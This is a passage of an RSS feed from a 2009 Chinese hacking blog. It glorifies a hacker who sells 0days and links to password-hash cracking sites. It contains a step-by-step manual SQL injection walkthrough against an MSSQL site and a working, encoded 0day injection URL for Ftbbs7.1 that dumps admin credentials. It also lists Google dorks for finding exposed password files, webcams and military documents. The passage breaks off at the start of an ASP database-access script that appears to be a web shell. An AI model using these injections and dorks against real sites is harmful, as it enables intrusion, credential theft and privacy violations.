<p>中国黑客有很多但是要说到美女黑客恐怕只有这么一位,YingCracker上海姑娘一位靠带徒弟,卖0day的职业黑客.有黑客界的朋友爆料说拜师YingCracker门下需要4千元到8千元不等.YingCracker不仅人长的漂亮而且技术也绝不比男性黑客差,尤其是交友广泛,手里的0day数不胜数.让一帮小黑fans们羡慕的直流口水.在这里祝愿国内新一代黑客早日成长,更希望能多出几个YingCracker这样的有技术有身材有相貌的美女黑客.<span id="more-1434"></span></p>
<div id="attachment_1436" class="wp-caption alignnone" style="width: 114px"><img class="size-full wp-image-1436" title="yingcracker1" src="http://www.p9.net.cn/wp-content/uploads/2009/05/yingcracker1.jpg" alt="YingCracker" width="104" height="139" /><p class="wp-caption-text">YingCracker</p></div>
<div id="attachment_1437" class="wp-caption alignnone" style="width: 114px"><img class="size-full wp-image-1437" title="yingcracker2" src="http://www.p9.net.cn/wp-content/uploads/2009/05/yingcracker2.jpg" alt="YingCracker" width="104" height="139" /><p class="wp-caption-text">YingCracker</p></div>
<div id="attachment_1438" class="wp-caption alignnone" style="width: 114px"><img class="size-full wp-image-1438" title="yingcracker3" src="http://www.p9.net.cn/wp-content/uploads/2009/05/yingcracker3.jpg" alt="YingCracker" width="104" height="139" /><p class="wp-caption-text">YingCracker</p></div>
<div id="attachment_1439" class="wp-caption alignnone" style="width: 114px"><img class="size-full wp-image-1439" title="yingcracker4" src="http://www.p9.net.cn/wp-content/uploads/2009/05/yingcracker4.jpg" alt="YingCracker" width="104" height="139" /><p class="wp-caption-text">YingCracker</p></div>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1434&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1434" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/yingcracker.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>国内最大的漏洞搜索网站</title>
		<link>http://www.p9.net.cn/sec/sebug.html</link>
		<comments>http://www.p9.net.cn/sec/sebug.html#comments</comments>
		<pubDate>Sat, 02 May 2009 00:46:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1395</guid>
		<description><![CDATA[SEBUG很早就知道了这个网站,也是国内黑客常去的网站,它的信息来源之广,漏洞信息量之大在国内无出其右,虽然是国人办的网站,但是对中文搜索的支持确不是很好,比如你要搜索某个cms漏洞你要是打cms的中文名是搜不到的,只能输入cms的英文名搜索.希望sebug的站长能改进一下.网址:http://www.sebug.net
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-690" title="黑客安全" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="sebug漏洞搜索" width="90" height="100" /></a><p class="wp-caption-text">sebug漏洞搜索</p></div>
<p>SEBUG很早就知道了这个网站,也是国内黑客常去的网站,它的信息来源之广,漏洞信息量之大在国内无出其右,虽然是国人办的网站,但是对中文搜索的支持确不是很好,比如你要搜索某个cms漏洞你要是打cms的中文名是搜不到的,只能输入cms的英文名搜索.希望sebug的站长能改进一下.网址:<a href="http://www.sebug.net" target="_blank">http://www.sebug.net</a></p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1395&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1395" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/sebug.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>120G彩虹表下载</title>
		<link>http://www.p9.net.cn/sec/hash-120g.html</link>
		<comments>http://www.p9.net.cn/sec/hash-120g.html#comments</comments>
		<pubDate>Mon, 27 Apr 2009 03:11:42 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1347</guid>
		<description><![CDATA[Hash 120g彩虹表下载:http://www.t00ls.net/tools/hash/
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<p>Hash 120g彩虹表下载:<a href="http://www.t00ls.net/tools/hash/" target="_blank">http://www.t00ls.net/tools/hash/</a></p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1347&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1347" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/hash-120g.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>php手工注入语句使用</title>
		<link>http://www.p9.net.cn/sec/phpinjection.html</link>
		<comments>http://www.p9.net.cn/sec/phpinjection.html#comments</comments>
		<pubDate>Thu, 23 Apr 2009 01:20:55 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1318</guid>
		<description><![CDATA[比如黑客找到注入点是:http://www.xxx.tk/news.php?id=300数据库类型是mssql2005.要用union查询,先确定有几个字段，使用order by 来完成，就是:http://www.xxx.tk/news.php?id=300 order by 7&#8211; 回显正常
http://www.xxx.tk/news.php?id=300 order by 8&#8211; 回显失败
说明总共7个字段，然后用null填充
http://www.xxx.tk/news.php?id=300 union all select null,null,null,null,null,null,null&#8211;显示正常
变换成不存在的id,前面加负号,或者加上and 1=2的条件,比如
http://www.xxx.tk/news.php?id=99999 union all select null,null,null,null,null,null,null&#8211;
确定下哪个位置可以爆出结果，先从第一个null开始变换，直接替换成user,就是:
http://www.xxx.tk/news.php?id=99999 union all select user,null,null,null,null,null,null&#8211;
看来运气比较好，当前用户名直接出现在某个可见的位置，要是没显示结果就继续变换位置
那就从这个位置开始暴出我们想要的结果
1.变换id获得库名
http://www.xxx.tk/news.php?id=300 and 1=2 union all select name,null,null,null,null,null,null+from+master.dbo.sysdatabases+where+dbid=1&#8211;
2.获得当前库名
http://www.xxx.tk/news.php?id=300 and 1=2 union all select db_name(),null,null,null,null,null,null&#8211;
3.获得当前版本
http://www.xxx.tk/news.php?id=300 and 1=2 union all select @@version,null,null,null,null,null,null&#8211;
4.变换N获得指定库的表名
http://www.xxx.tk/news.php?id=300 and 1=2 union all select name,null,null,null,null,null,null+from+BugTracker.dbo.sysobjects+where xtype=CHAR(85) and name not in (select top [...]]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-690" title="php注入" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="PHP手工注入使用" width="90" height="100" /></a><p class="wp-caption-text">PHP手工注入使用</p></div>
<p>比如黑客找到注入点是:http://www.xxx.tk/news.php?id=300数据库类型是mssql2005.要用union查询,先确定有几个字段，使用order by 来完成，就是:http://www.xxx.tk/news.php?id=300 order by 7&#8211; 回显正常<br />
http://www.xxx.tk/news.php?id=300 order by 8&#8211; 回显失败<br />
说明总共7个字段，然后用null填充<br />
http://www.xxx.tk/news.php?id=300 union all select null,null,null,null,null,null,null&#8211;显示正常<span id="more-1318"></span><br />
变换成不存在的id,前面加负号,或者加上and 1=2的条件,比如<br />
http://www.xxx.tk/news.php?id=99999 union all select null,null,null,null,null,null,null&#8211;<br />
确定下哪个位置可以爆出结果，先从第一个null开始变换，直接替换成user,就是:<br />
http://www.xxx.tk/news.php?id=99999 union all select user,null,null,null,null,null,null&#8211;<br />
看来运气比较好，当前用户名直接出现在某个可见的位置，要是没显示结果就继续变换位置<br />
那就从这个位置开始暴出我们想要的结果<br />
1.变换id获得库名<br />
http://www.xxx.tk/news.php?id=300 and 1=2 union all select name,null,null,null,null,null,null+from+master.dbo.sysdatabases+where+dbid=1&#8211;<br />
2.获得当前库名<br />
http://www.xxx.tk/news.php?id=300 and 1=2 union all select db_name(),null,null,null,null,null,null&#8211;<br />
3.获得当前版本<br />
http://www.xxx.tk/news.php?id=300 and 1=2 union all select @@version,null,null,null,null,null,null&#8211;<br />
4.变换N获得指定库的表名<br />
http://www.xxx.tk/news.php?id=300 and 1=2 union all select name,null,null,null,null,null,null+from+BugTracker.dbo.sysobjects+where xtype=CHAR(85) and name not in (select top N name from BugTracker.dbo.sysobjects where xtype=CHAR(85))&#8211;<br />
5.获得指定库所有列名<br />
(1) 这里的M和获得库名时的N必须一致，不然无法得到正确的库名ID<br />
http://www.xxx.tk/news.php?id=300 and 1=2 union all select ID,null,null,null,null,null,null+from+BugTracker.dbo.sysobjects+where xtype=CHAR(85) and ID not in (select top M ID from BugTracker.dbo.sysobjects where xtype=CHAR(85))&#8211;<br />
(2)最后的ID值即是(1)中回显的数值,通过变换N值获得所有列名<br />
http://www.xxx.tk/news.php?id=300 and 1=2 union all select NAME,null,null,null,null,null,null from BugTracker.dbo.syscolumns where ID=53575229 and name not in (select top N name from BugTracker.dbo.syscolumns where ID=53575229)&#8211;<br />
6.根据前几步所得结果获得字段内容<br />
http://www.xxx.tk/news.php?id=300 and 1=2 union all select bug_id,null,null,null,null,null,null from BugTracker..mantis_bug_file_table&#8211;可自加条件进行查询</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1318&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1318" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/phpinjection.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IP反查域名多了个选择IP邻居</title>
		<link>http://www.p9.net.cn/sec/iplinju.html</link>
		<comments>http://www.p9.net.cn/sec/iplinju.html#comments</comments>
		<pubDate>Wed, 22 Apr 2009 01:38:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1315</guid>
		<description><![CDATA[IP反查域名的网站我介绍了很多,而且还根据效果做了排名.今天给大家介绍的IP邻居这个网站不仅反查量大,而且还显示同IP站点的PR值,百度和谷歌的收录量.目前国内IP反查域名站点在数据量和功能上无出其右,国外站点的速度又不敢恭维.所以P9强烈推荐大家使用IP邻居反查域名.网址:http://www.iplinju.com/更多IP反查域名站点请参看介绍几个同ip地址反查域名的网站这篇日志.
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_1316" class="wp-caption alignright" style="width: 124px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-1316" title="iplinju" src="http://www.p9.net.cn/wp-content/uploads/2009/04/iplinju.jpg" alt="IP邻居" width="114" height="62" /></a><p class="wp-caption-text">IP邻居</p></div>
<p>IP反查域名的网站我介绍了很多,而且还根据效果做了排名.今天给大家介绍的IP邻居这个网站不仅反查量大,而且还显示同IP站点的PR值,百度和谷歌的收录量.目前国内IP反查域名站点在数据量和功能上无出其右,国外站点的速度又不敢恭维.所以P9强烈推荐大家使用IP邻居反查域名.网址:<a href="http://www.iplinju.com/" target="_blank">http://www.iplinju.com/</a>更多IP反查域名站点请参看<a title="Permanent Link to 介绍几个同ip地址反查域名的网站" rel="bookmark" href="http://www.p9.net.cn/sec/ip-address-with-the-introduction-of-several-anti-search-web-domain-name.html" target="_blank">介绍几个同ip地址反查域名的网站</a>这篇日志.</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1315&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1315" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/iplinju.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>一个新的md5密码破解站</title>
		<link>http://www.p9.net.cn/sec/md5pojiexinzhan.html</link>
		<comments>http://www.p9.net.cn/sec/md5pojiexinzhan.html#comments</comments>
		<pubDate>Sun, 19 Apr 2009 01:36:39 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1287</guid>
		<description><![CDATA[随着cmd5.com的部分md5密码破解收费,p9就致力于寻找新的md5密码破解站,今天这个是具有120G数据的md5破解新站http://www.t00ls.net/tools/md5/其它免费md5破解站请参看md5破解收费了咋办这篇博文!
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-690" title="新的md5密码破解站" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="新的md5密码破解站" width="90" height="100" /></a><p class="wp-caption-text">新的md5密码破解站</p></div>
<p>随着cmd5.com的部分md5密码破解收费,p9就致力于寻找新的md5密码破解站,今天这个是具有120G数据的md5破解新站<a href="http://www.t00ls.net/tools/md5/">http://www.t00ls.net/tools/md5/</a>其它免费md5破解站请参看<a title="Permanent Link to md5破解收费了咋办" rel="bookmark" href="http://www.p9.net.cn/sec/md5-crack.html">md5破解收费了咋办</a>这篇博文!</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1287&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1287" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/md5pojiexinzhan.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>利用google突破各种封锁和一些特殊命令</title>
		<link>http://www.p9.net.cn/sec/google-tuposousuo.html</link>
		<comments>http://www.p9.net.cn/sec/google-tuposousuo.html#comments</comments>
		<pubDate>Sat, 18 Apr 2009 02:18:04 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1281</guid>
		<description><![CDATA[在搜索框上输入： “index of/ ” 　inurl:lib
再按搜索你将进入许多图书馆，并且一定能下载自己喜欢的书籍。
在搜索框上输入： “index of /” 　cnki
再按搜索你就可以找到许多图书馆的CNKI、VIP、超星等入口！
在搜索框上输入：　“index of /” 　ppt
再按搜索你就可以突破网站入口下载powerpint作品！
在搜索框上输入： “index of /” 　mp3
再按搜索你就可以突破网站入口下载mp3、rm等影视作品！
在搜索框上输入：　“index of /” .s**
再按搜索你就可以突破网站入口下载flash作品！
在搜索框上输入： “index of /” 　要下载的软件名
再按搜索你就可以突破网站入口下载软件！
注意引号应是英文的！
再透露一下，如果你输入：
“index of /” 　AVI
另补上第二篇
用GOOgle看世界!!!只要你在GOOGLE里输入特殊的关键字,就可以搜到数千个摄象头的IP地址!通过他你就可以看到其所摄的实时影象!!
在google里输入
inurl:&#8221;viewerframe?mode=&#8221;
随便打开一个,然后按提示装一个插件,就可以看到了!!!
再补上第三篇
三则黑客的Google搜索技巧简介
大家都知道，Google毫无疑问是当今世界上最强大的搜索引擎。然而，在黑客手中，它也是一个秘密武器，它能搜索到一些你意想不到的信息。赛迪编者把他们进行了简单的总结不是希望您利用他去攻击别人的网站，而是利用这些技巧去在浩如烟海的网络信息中，来个大海捞针，寻找到对您有用的信息。
如果您是一名普通网民，您可以使用黑客的技巧扩大自己的视野，提高自己的检索效率；如果您是一名网管，请您赶快看看您的网站是否做好了对下面黑客探测手段的防范措施，如果没有就赶快来个亡羊补牢，毕竟隐患胜于明火，防范胜于救灾；如果您是一名黑客，相信您早以在别的黑客站点上见过类似的方法，这篇文章对您没什么用处，这里的技巧对您是小儿科，菜鸟级！您可以节省宝贵的时间做更有意义的事情，这篇文章您不用看了，到别处去吧！
基于上面的考虑我编发了这篇文章。
搜索URL
比如我们提交这种形式：passwd.txt site:virtualave.net
看到了什么？是不是觉得太不可思议了！有很多基于CGI/PHP/ASP 类型的留言板存在这种问题。有时我们得到密码甚至还是明码的！管理员或许太不负责了，或许安全防范的意识太差了，如果你是网络管理员，赶快检查一下不要让恶意攻击者捡了便宜。不要太相信DES加密，即使我们的密码经过DES 加密的密码，黑客们还是可以通过许多破解软件来搞定。
这次我们能得到包含密码的文件。“site:virtualave.net”意思是只搜索 virutalave.net 的URL。virutalave.net是一个网络服务器提供商。
同样，我们可以搜索一些顶级域名，比如：.net .org .jp .in .gr
config.txt site:.jp
admin.txt site:.tw
搜索首页的目录
首页是非常有用的，它会提供给你许多有用的信息。
我们提交如下的形式：
&#8220;Index of /admin&#8221;
&#8220;Index of /secret&#8221;
&#8220;Index of /cgi-bin&#8221; site:.edu
你可以自己定义搜索的首页字符。这样就可以获得许多信息。
搜索特定的文件类型
比如你想指定一种文件的类型，可以提交如下形式：
file无效:.doc site:.mil classified
这个就是搜索军方的资料，你可以自定义搜索。
再提供一个第四篇
Google 的特殊功能
1 、查询电话号码
Google 的搜索栏中最新加入了电话号码和美国街区地址的查询信息。
个人如想查找这些列表，只要填写姓名，城市和省份。
如果该信息为众人所知，你就会在搜索结果页面的最上方看到搜索的电话和街区地址
你还可以通过以下任何一种方法找到该列表：
名字（或首位大写字母），姓，电话地区号
名字（或首位大写字母），姓，邮递区号
名字（或首位大写字母），姓，城市（可写州）
名字（或首位大写字母），姓，州
电话号码，包括区号
名字，城市，州
名字，邮递区号
2 、查找 PDF 文件
现在 GOOGLE 的搜索结果中包括了 PDF [...]]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-690 " title="google突破搜索" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="google突破搜索" width="90" height="100" /></a><p class="wp-caption-text">google突破搜索</p></div>
<p>在搜索框上输入： “index of/ ” 　inurl:lib<br />
再按搜索你将进入许多图书馆，并且一定能下载自己喜欢的书籍。<br />
在搜索框上输入： “index of /” 　cnki<br />
再按搜索你就可以找到许多图书馆的CNKI、VIP、超星等入口！<br />
在搜索框上输入：　“index of /” 　ppt<br />
再按搜索你就可以突破网站入口下载powerpint作品！<br />
在搜索框上输入： “index of /” 　mp3<span id="more-1281"></span><br />
再按搜索你就可以突破网站入口下载mp3、rm等影视作品！<br />
在搜索框上输入：　“index of /” .s**<br />
再按搜索你就可以突破网站入口下载flash作品！<br />
在搜索框上输入： “index of /” 　要下载的软件名<br />
再按搜索你就可以突破网站入口下载软件！<br />
注意引号应是英文的！<br />
再透露一下，如果你输入：<br />
“index of /” 　AVI<br />
另补上第二篇<br />
用GOOgle看世界!!!只要你在GOOGLE里输入特殊的关键字,就可以搜到数千个摄象头的IP地址!通过他你就可以看到其所摄的实时影象!!<br />
在google里输入<br />
inurl:&#8221;viewerframe?mode=&#8221;<br />
随便打开一个,然后按提示装一个插件,就可以看到了!!!<br />
再补上第三篇<br />
三则黑客的Google搜索技巧简介<br />
大家都知道，Google毫无疑问是当今世界上最强大的搜索引擎。然而，在黑客手中，它也是一个秘密武器，它能搜索到一些你意想不到的信息。赛迪编者把他们进行了简单的总结不是希望您利用他去攻击别人的网站，而是利用这些技巧去在浩如烟海的网络信息中，来个大海捞针，寻找到对您有用的信息。<br />
如果您是一名普通网民，您可以使用黑客的技巧扩大自己的视野，提高自己的检索效率；如果您是一名网管，请您赶快看看您的网站是否做好了对下面黑客探测手段的防范措施，如果没有就赶快来个亡羊补牢，毕竟隐患胜于明火，防范胜于救灾；如果您是一名黑客，相信您早以在别的黑客站点上见过类似的方法，这篇文章对您没什么用处，这里的技巧对您是小儿科，菜鸟级！您可以节省宝贵的时间做更有意义的事情，这篇文章您不用看了，到别处去吧！<br />
基于上面的考虑我编发了这篇文章。<br />
搜索URL<br />
比如我们提交这种形式：passwd.txt site:virtualave.net<br />
看到了什么？是不是觉得太不可思议了！有很多基于CGI/PHP/ASP 类型的留言板存在这种问题。有时我们得到密码甚至还是明码的！管理员或许太不负责了，或许安全防范的意识太差了，如果你是网络管理员，赶快检查一下不要让恶意攻击者捡了便宜。不要太相信DES加密，即使我们的密码经过DES 加密的密码，黑客们还是可以通过许多破解软件来搞定。<br />
这次我们能得到包含密码的文件。“site:virtualave.net”意思是只搜索 virutalave.net 的URL。virutalave.net是一个网络服务器提供商。<br />
同样，我们可以搜索一些顶级域名，比如：.net .org .jp .in .gr<br />
config.txt site:.jp<br />
admin.txt site:.tw<br />
搜索首页的目录<br />
首页是非常有用的，它会提供给你许多有用的信息。<br />
我们提交如下的形式：<br />
&#8220;Index of /admin&#8221;<br />
&#8220;Index of /secret&#8221;<br />
&#8220;Index of /cgi-bin&#8221; site:.edu<br />
你可以自己定义搜索的首页字符。这样就可以获得许多信息。<br />
搜索特定的文件类型<br />
比如你想指定一种文件的类型，可以提交如下形式：<br />
file无效:.doc site:.mil classified<br />
这个就是搜索军方的资料，你可以自定义搜索。<br />
再提供一个第四篇<br />
Google 的特殊功能<br />
1 、查询电话号码<br />
Google 的搜索栏中最新加入了电话号码和美国街区地址的查询信息。<br />
个人如想查找这些列表，只要填写姓名，城市和省份。<br />
如果该信息为众人所知，你就会在搜索结果页面的最上方看到搜索的电话和街区地址<br />
你还可以通过以下任何一种方法找到该列表：<br />
名字（或首位大写字母），姓，电话地区号<br />
名字（或首位大写字母），姓，邮递区号<br />
名字（或首位大写字母），姓，城市（可写州）<br />
名字（或首位大写字母），姓，州<br />
电话号码，包括区号<br />
名字，城市，州<br />
名字，邮递区号<br />
2 、查找 PDF 文件<br />
现在 GOOGLE 的搜索结果中包括了 PDF 文件。尽管 PDF 文件不如 HTML 文件那么多，但他们经常具备一些其他文件不具备的高质量信息<br />
为了显示一个搜索结果是 PDF 文件而不是网页， PDF 文件的标题开头显示蓝色文本。<br />
这就是让你知道 ACRTOBAT READER 程序会启动来阅读文件<br />
如果你的计算机没装有该程序，计算机会指导你去能免费下载该程序的网页。<br />
使用 PDF 文件时，相关的网页快照会由“ TEXT VERSION ”代替，它是 PDF 文档的复制文件，该文件除去了所有格式化命令。<br />
如果你在没有 PDF 链接的情况下想看一系列搜索结果，只要在搜索栏中打上 -inurldf 加上你的搜索条件。<br />
3 、股票报价<br />
用 Google 查找股票和共有基金信息，只要输入一个或多个 NYSE ， NASDAQ ， AMEX 或<br />
共有基金的股票行情自动收录机的代码，也可以输入在股市开户的公司名字。<br />
如果 Google 识别出你查询的是股票或者共有基金，它回复的链接会直接连到高质量的金融信息提供者提供的股票和共有基金信息。<br />
在你搜索结果的开头显示的是你查询的股市行情自动收录器的代码。如果你要查找一家公司的名字（比如， INTEL ），请查看“股票报价”在 Google 搜索结果的金融栏里会有那个公司的主页的链接（比如， <a href="http://www.INTEL.COM">WWW.INTEL.COM</a> ）。<br />
Google 是以质量为基础来选择和决定金融信息提供者的，包括的因素有下载速度，用户界面及其功能。<br />
4 、找找谁和你链接<br />
有些单词如果带有冒号就会有特殊的意思。比如 link ：操作员。查询 link:siteURL ，就会显示所有指向那个 URL 的网页。举例来说，链接 <a href="http://www.Google.com">www.Google.com</a> 会向你显示所有指向 GOOGLE 主页的网页。但这种方法不能与关键字查询联合使用。<br />
5 、查找站点<br />
单词 site 后面如果接上冒号就能够将你的搜索限定到某个网站。具体做法是：在 c 搜索栏中使用 site:sampledomain.com 这个语法结构。比如，在斯坦福找申请信息，输入：<br />
admission site:www.stanford.edu<br />
6 、查找字典释意<br />
查找字典释意的方法是在搜索栏中输入你要查询的内容。在我们根据要求找到所有的字典释意都会标有下划线，位于搜索结果的上面，点击链接你会找到字典提供者根据要求给出的相关定义。 7 、用 GOOLGE 查找地图<br />
想用 Google 查找街区地图，在 Google 搜索栏中输入美国街区地址，包括邮递区号或城市 / 州（比如 165 大学大街 PALO ALTO CA ）。通常情况下，街区地址和城市的名字就足够了。<br />
当 Google 识别你的要求是查找地图，它会反馈给你有高质量地图提供者提供的链接，使你直接找到相关地图。我们是以质量为基础选择这些地图提供者。值得注意的是 Google 和使用的地图信息提供者没有任何关联。<br />
■ 标题搜索<br />
　多数搜索引擎都支持针对网页标题的搜索，命令是“title:”，在Yahoo中是“t:”（注意冒号为英文字符且后面不跟空格）。在进行标题搜索时，前面提到的逻辑符号和精确匹配原则同样适用。请看下面的例子：<br />
· title（或t）:computer adventure games<br />
· title:+computer +adventure +games<br />
· title:+computer +games -adventure<br />
· title:&#8221;computer adventure games&#8221;<br />
返回的结果都是标题中包含关键字、词的信息条目。</p>
<p>■ 网站搜索<br />
　此外我们还可以针对网站进行搜索，命令是“site:”（Google）、“host:”（AltaVista）、“url:”（Infoseek）或“domain:”（HotBot）。如想查找AAA游戏制作公司网站的所有网页，可以输入：· site(或host/url/domain):www.AAA.com<br />
还可以在其中加入其他命令组成复杂的搜索条件，如：· site:www.AAA.com +title:&#8221;computer games&#8221; -adventure<br />
意思是查找AAA公司网站中所有标题里含有computer games的网页，但排除关于冒险游戏的网页。<br />
说到这里大家可能已经意识到了，运用此命令我们可以达到一个极其重要的目的，就是检查我们的网站被索引的网页有多少。因此建议大家牢记这个命令。另外运用“site/host/url/domain”等搜索命令还可实现某一网站的站内搜索。比如Google引擎由于技术的先进性，通过其“site”命令实现的网站内部搜索甚至比专门的站内搜索程序还要好。</p>
<p>■ 链接搜索<br />
　在Google和AltaVista中，用户均可通过“link:”命令来查找某网站的外部导入链接（inbound links）。如：· link:www.AAA.com<br />
其他一些引擎也有同样的功能，只不过命令格式稍有区别。你可以用这个命令来查看是谁以及有多少网站与你做了链接。<br />
除上述命令外，还有其他一些特殊搜索命令，如“filetype:”（限定搜索的文档类别）、“daterange:”（限定搜索的时间范围）、“phonebook:”（查询电话）等等，感兴趣的话大家可以自己研究一下。Google引擎提供了比较完备的搜索功能，具体可参考Google从入门到精通专题介绍。</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1281&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1281" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/google-tuposousuo.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ftbbs7.1静态GBK版注入0day(coolkid提供)</title>
		<link>http://www.p9.net.cn/sec/ftbbs71-0day.html</link>
		<comments>http://www.p9.net.cn/sec/ftbbs71-0day.html#comments</comments>
		<pubDate>Tue, 07 Apr 2009 01:58:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[注入]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1160</guid>
		<description><![CDATA[Ftbbs7.1静态GBK版ftbbsmyinfo.asp文件存在注入漏洞目前0day利用方式http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin
请使用ftbbs的用户关注它的官网安全补丁发布.
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/0day"><img class="size-full wp-image-690" title="ftbbs7.1注入漏洞" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="ftbbs7.1注入漏洞" width="90" height="100" /></a><p class="wp-caption-text">ftbbs7.1注入漏洞</p></div>
<p>Ftbbs7.1静态GBK版ftbbsmyinfo.asp文件存在注入漏洞目前0day利用方式<a href="http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin">http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin</a></p>
<p>请使用ftbbs的用户关注它的官网安全补丁发布.</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1160&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1160" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/ftbbs71-0day.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>web操作mssql数据库asp源码</title>
		<link>http://www.p9.net.cn/sec/asp-mssql.html</link>
		<comments>http://www.p9.net.cn/sec/asp-mssql.html#comments</comments>
		<pubDate>Tue, 07 Apr 2009 01:44:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1156</guid>
		<description><![CDATA[asp操作mssql数据库的源码:
&#60;title&#62;SQL_Dir By Bin&#60;/title&#62;
&#60;style id=theStyle&#62;
BODY {
FONT-SIZE: 9pt;
COLOR: #000000;
background-color: #ffffff;
